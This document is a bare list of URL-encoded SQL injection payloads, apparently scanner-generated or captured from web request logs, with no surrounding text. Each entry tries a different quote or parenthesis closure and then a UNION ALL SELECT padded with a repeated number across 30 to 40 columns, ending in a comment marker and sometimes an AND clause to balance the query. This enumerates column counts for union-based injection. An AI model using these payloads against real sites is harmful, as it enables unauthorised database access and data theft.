-7914%27%29%20UNION%20ALL%20SELECT%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%2C%205146%23 -7085%27%29%20UNION%20ALL%20SELECT%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%23 -3907%27%29%20UNION%20ALL%20SELECT%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%2C%206841%23 -9376%27%29%20UNION%20ALL%20SELECT%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%2C%203733%23 -2357%27%29%20UNION%20ALL%20SELECT%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%2C%202706%23 -9841%27%29%20UNION%20ALL%20SELECT%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%23 -9829%27%29%20UNION%20ALL%20SELECT%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%2C%205167%23 -4686%27%29%20UNION%20ALL%20SELECT%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%2C%207407%23 -9322%27%29%20UNION%20ALL%20SELECT%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%23 -5018%27%29%20UNION%20ALL%20SELECT%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%2C%207877%23 -7530%27%20UNION%20ALL%20SELECT%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%2C%201489%23 -6765%27%20UNION%20ALL%20SELECT%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%23 -9261%27%20UNION%20ALL%20SELECT%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%2C%202488%23 -3364%27%20UNION%20ALL%20SELECT%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%2C%207447%23 -5262%27%20UNION%20ALL%20SELECT%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%2C%201561%23 -6234%27%20UNION%20ALL%20SELECT%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%23 -2933%27%20UNION%20ALL%20SELECT%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%2C%204890%23 -4553%27%20UNION%20ALL%20SELECT%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%23 -4373%27%20UNION%20ALL%20SELECT%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%2C%206429%23 -2801%27%20UNION%20ALL%20SELECT%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%2C%205302%23 -4880%22%20UNION%20ALL%20SELECT%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%2C%209567%23 -9990%22%20UNION%20ALL%20SELECT%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%2C%201712%23 -1505%22%20UNION%20ALL%20SELECT%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%2C%207467%23 -6439%22%20UNION%20ALL%20SELECT%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%23 -7833%22%20UNION%20ALL%20SELECT%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%23 -9826%22%20UNION%20ALL%20SELECT%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%23 -5206%22%20UNION%20ALL%20SELECT%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%2C%209629%23 -3316%22%20UNION%20ALL%20SELECT%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%23 -6391%22%20UNION%20ALL%20SELECT%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%2C%203595%23 -2607%22%20UNION%20ALL%20SELECT%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%2C%202541%23 -4256%29%20UNION%20ALL%20SELECT%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%2C%205020%23%20AND%20%289464%3D9464 -5302%29%20UNION%20ALL%20SELECT%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%2C%207279%23%20AND%20%284404%3D4404 -6387%29%20UNION%20ALL%20SELECT%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%2C%203625%23%20AND%20%286484%3D6484 -5866%29%20UNION%20ALL%20SELECT%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%2C%209105%23%20AND%20%285223%3D5223 -1694%29%20UNION%20ALL%20SELECT%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%23%20AND%20%286243%3D6243 -4479%29%20UNION%20ALL%20SELECT%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%2C%201163%23%20AND%20%286678%3D6678 -9193%29%20UNION%20ALL%20SELECT%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%23%20AND%20%281073%3D1073 -1205%29%20UNION%20ALL%20SELECT%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%2C%207108%23%20AND%20%288194%3D8194 -2498%29%20UNION%20ALL%20SELECT%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%2C%201317%23%20AND%20%281800%3D1800 -2592%29%20UNION%20ALL%20SELECT%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%2C%201395%23%20AND%20%281172%3D1172 -2285%29%29%20UNION%20ALL%20SELECT%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%2C%203137%23%20AND%20%28%288623%3D8623 -7749%29%29%20UNION%20ALL%20SELECT%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%2C%202303%23%20AND%20%28%285716%3D5716 -4773%29%29%20UNION%20ALL%20SELECT%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%23%20AND%20%28%288364%3D8364 -9781%29%29%20UNION%20ALL%20SELECT%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%2C%202418%23%20AND%20%28%284849%3D4849 -8694%29%29%20UNION%20ALL%20SELECT%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%23%20AND%20%28%282205%3D2205 -4057%29%29%20UNION%20ALL%20SELECT%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%23%20AND%20%28%283266%3D3266 -1155%29%29%20UNION%20ALL%20SELECT%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%23%20AND%20%28%281891%3D1891 -7583%29%29%20UNION%20ALL%20SELECT%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%2C%203995%23%20AND%20%28%281335%3D1335 -5316%29%29%20UNION%20ALL%20SELECT%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%2C%202321%23%20AND%20%28%287439%3D7439 -7643%29%29%20UNION%20ALL%20SELECT%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%2C%207099%23%20AND%20%28%287861%3D7861 -7610%29%29%29%20UNION%20ALL%20SELECT%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%2C%204218%23%20AND%20%28%28%285086%3D5086 -3209%29%29%29%20UNION%20ALL%20SELECT%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%23%20AND%20%28%28%281642%3D1642 -4415%29%29%29%20UNION%20ALL%20SELECT%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%2C%207538%23%20AND%20%28%28%286340%3D6340 -4458%29%29%29%20UNION%20ALL%20SELECT%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%2C%208124%23%20AND%20%28%28%284228%3D4228 -2253%29%29%29%20UNION%20ALL%20SELECT%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%2C%208813%23%20AND%20%28%28%285532%3D5532 -9476%29%29%29%20UNION%20ALL%20SELECT%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%2C%201632%23%20AND%20%28%28%284981%3D4981 -6241%29%29%29%20UNION%20ALL%20SELECT%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%23%20AND%20%28%28%283960%3D3960 -5070%29%29%29%20UNION%20ALL%20SELECT%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%23%20AND%20%28%28%288297%3D8297 -3233%29%29%29%20UNION%20ALL%20SELECT%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%23%20AND%20%28%28%286126%3D6126 -9685%29%29%29%20UNION%20ALL%20SELECT%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%23%20AND%20%28%28%289126%3D9126 -8671%20UNION%20ALL%20SELECT%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%2C%201161%23 